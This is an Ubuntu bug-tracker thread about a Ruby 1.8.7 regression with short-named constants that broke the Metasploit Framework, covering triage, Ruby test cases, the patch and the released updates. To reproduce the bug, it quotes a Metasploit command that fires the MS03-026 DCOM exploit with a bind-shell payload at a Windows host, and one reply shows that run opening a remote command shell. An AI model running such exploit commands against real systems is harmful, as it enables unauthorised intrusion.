Ruby 1.8 package breaks the Metasploit Framework (short-named constants)

Thanks a lot for taking the time to report this issue and help us make Ubuntu better.
Could you please provide us with a step by step way to reproduce this issue?
Also, would you know exactly which commit fixed the problem between the 2 release?

Thank you for using Ubuntu and taking the time to report a bug. I reviewed the changelog and svn log for ruby 1.8 when this report came in and again just now, but nothing jumped out at me for fixing short-named constants. Do you know which commit fixed the problem? Also, can you provide a small test case for where short-named constants fail?

I have milestoned this to be fixed in intrepid-updates after release. If the commit can be quickly found and it is not too intrusive, it might be possible to update ruby1.8 before release. Thanks for your help on this!

Sure, let me write a script that demonstrates the bug, its a little tricky because it only occurs in some convoluted Ruby objects (classes which inherit from mixins which define short-name constants, with a different base class than the class which includes them). I had a link to the Ruby patch which solved this, but need to dig it up again.

I was not able to trigger this with a standalone test case, but it is easy to reproduce using the svn version of the Metasploit Framework. The example below assumes you have a Windows server somewhere with port 135 open:

$ svn co http://metasploit.com/svn/framework3/trunk/ msf3
$ ruby msf3/msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=10.10.10.250 E
(change 10.10.10.250 to a machine with DCOM open, patch level does not matter)

[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.10.10.250[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.10.10.250[135] ...
[-] Exploit failed: uninitialized constant Msf::ModuleSet::NDR

A working/patched version of Ruby will not trigger that "uninitialized constant" error.

-HD

Marking as Confirmed. I was able to reproduce it, but haven't found the patch yet.

Patch: http://svn.ruby-lang.org/cgi-bin/viewvc.cgi?view=rev&revision=18485

Test Case: http://blade.nagaokaut.ac.jp/cgi-bin/scat.rb/ruby/ruby-dev/35116

(thanks Antoine!)

Thanks! The patch fixes metasploit, but does not bring the behavior back to 1.8.6 as described in the test case url that is provided. Eg:
class A
   @@a = 'A'
   def a=(x)
      @@a = x
   end
   def a
      @@a
   end
end

B = A.dup
B.new.a = 'B'

# should show 'B'
p A.new.a

The above still shows 'A' in patched 1.8.7, but is 'B' in 1.8.6.

The following:
class A
  Const = 'A'
  def foo
    p Const
  end
end

B = A.dup

class B
  Const = 'B'
end

p A::Const
A.new.foo
p B::Const
B.new.foo

This should display:
"A"
"A"
"B"
"A"

But on patched 1.8.7 I got:
/tmp/35116b.rb:11: warning: already initialized constant Const
"A"
"A"
"B"
"B"

That said, unpatched 1.8.7 still shows 'A' in the first test, but the second results in:
/tmp/35116b.rb:11: warning: already initialized constant Const
"A"
"A"
"B"
/tmp/35116b.rb:4:in `foo': uninitialized constant Const (NameError)
 from /tmp/35116b.rb:19

So clearly, the patch partially addresses this test case. Does the stable ruby snapshot work the same as 1.8.6 in the above test cases?

From the looks of it, even though the behavior is different between 1.8.6 and 1.8.7-patched, it was addressing an ambiguity in the first place and the 1.8.7-patched behavior should be considered correct. The 8.10 release has shipped with the broken 1.8.7 interpreter and no way for users to downgrade to 1.8.6. Any chance a new package can be pushed fairly soon for 8.10?

Based on this information, I will prepare on SRU. Thanks for the feedback. :)

Was there any special about the 1.8.7 that was shipped with 8.10? One of our users is hitting this error, but our test case to detect the buggy version is not firing, even though it works fine for the 1.8.7 release from the ruby web site:

#
# Check for the ugly 1.8.7 short-named constants bug
#

class ConstBugTestA
        Const = 'A'
        def test
                Const == 'A'
        end
end

ConstBugTestC = ConstBugTestA.dup

class ConstBugTestB < ConstBugTestC
        Const = 'B'
end

def ruby_187_const_bug
        bugged = false

        begin
                ConstBugTestA.new.test()
                ConstBugTestB.new.test()
        rescue ::NameError
                bugged = true
        end

        bugged
end

if(ruby_187_const_bug())
        $stderr.puts ""
        $stderr.puts "***********************************************************************"
        $stderr.puts "*** *"
        $stderr.puts "*** This version of the Ruby interpreter has significant problems, we *"
        $stderr.puts "*** strongly recommend that you switch to version 1.8.6 until these *"
        $stderr.puts "*** issues have been corrected. Alternatively, you can download, *"
        $stderr.puts "*** build, and install the latest Ruby snapshot from: *"
        $stderr.puts "*** - http://www.ruby-lang.org/ *"
        $stderr.puts "*** For more information, please see the following URL: *"
        $stderr.puts "*** - https://bugs.launchpad.net/bugs/282302 *"
        $stderr.puts "*** *"
        $stderr.puts "***********************************************************************"
        $stderr.puts ""
end

Nothing special was done with the 8.10 release. When I checked svn version of metasploit on 8.10 before release, received the warning message just fine.

I'm preparing an updated version for 9.04, and will then work on the 8.10 version.

Any idea when these changes will be committed? Been staying away from Intrepid until changes for metasploit were implemented....

Thanks!

This bug was fixed in the package ruby1.8 - 1.8.7.72-1ubuntu1

---------------
ruby1.8 (1.8.7.72-1ubuntu1) jaunty; urgency=low

  * debian/patches/905_short_named_constants.dpatch: Fix for short-named
    constants regression (LP: #282302)

 -- Jamie Strandboge <email address hidden> Mon, 27 Oct 2008 12:18:35 -0500

Impact: this regression breaks (at least) the metasploit framework. It appears that short-named constants are not generally in wide-spread use (based on community feedback and lack of other bug reports)

Development release: applied the exact patch to 9.04 in 1.8.7.72-1ubuntu1. This is from http://svn.ruby-lang.org/cgi-bin/viewvc.cgi?view=rev&revision=18485, and is already in upstream's stable snapshot. Debdiff for the upload is attached.

TEST CASE (from HD Moore):
The example below assumes you have a Windows server somewhere with port 135 open:

$ svn co http://metasploit.com/svn/framework3/trunk/ msf3
$ ruby msf3/msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=10.10.10.250 E
(change 10.10.10.250 to a machine with DCOM open, patch level does not matter)

[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.10.10.250[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.10.10.250[135] ...
[-] Exploit failed: uninitialized constant Msf::ModuleSet::NDR

A working/patched version of Ruby will not trigger that "uninitialized constant" error.

Regression potential: appears low due to the perceived infrequency of using short-named constants

Accepted into intrepid-proposed, please test and give feedback here. Please see https://wiki.ubuntu.com/Testing/EnableProposed for documentation how to enable and use -proposed. Thank you in advance!

I can confirm that intrepid-proposed package does fix the short-named constants issue in Metasploit.

POC:

root@sslinuxvm12:/pentest/exploits/framework3# ./msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=10.211.55.5 E
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.211.55.5[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.211.55.5[135] ...
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (10.211.55.3:39156 -> 10.211.55.5:4444)

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

$ apt-cache policy ruby1.8
ruby1.8:
  Installed: 1.8.7.72-1ubuntu0.1
  Candidate: 1.8.7.72-1ubuntu0.1
  Version table:
 *** 1.8.7.72-1ubuntu0.1 0
        500 http://archive.ubuntu.com intrepid-proposed/main Packages
        100 /var/lib/dpkg/status
     1.8.7.72-1 0
        500 http://192.168.122.1 intrepid/main Packages

Before upgrade:
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.122.208[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.122.208[135] ...
[-] Exploit failed: uninitialized constant Msf::ModuleSet::NDR

After upgrade:
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.122.208[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.122.208[135] ...
[*] Sending exploit ...
...

New version also passes (the somewhat limited) qa-regression-testing with no regressions. The build system also has a test suite that is run by default (and obviously passed).

Can we get this released to intrepid yet? I have it working perfectly in intrepid with intrepid-proposed... The sooner this gets pushed the better :)

This bug was fixed in the package ruby1.8 - 1.8.7.72-1ubuntu0.1

---------------
ruby1.8 (1.8.7.72-1ubuntu0.1) intrepid-proposed; urgency=low

  * debian/patches/905_short_named_constants.dpatch: Fix for short-named
    constants regression (LP: #282302)

 -- Jamie Strandboge <email address hidden> Thu, 20 Nov 2008 13:24:03 -0600

Copied to intrepid-updates.

I have found many advices howto downgrade Ruby 1.8.7 to 1.8.6 as recommended by Rails core team.
You can found the article
http://railsgeek.com/2008/11/27/ubuntu-8-10-downgrade-ruby-1-8-7-to-1-8-6

mikhailov,

There shouldn't be a need to downgrade as the packages are fixed. If you are continuing to have problems with 1.8.7.72-1ubuntu0.1, please report them here.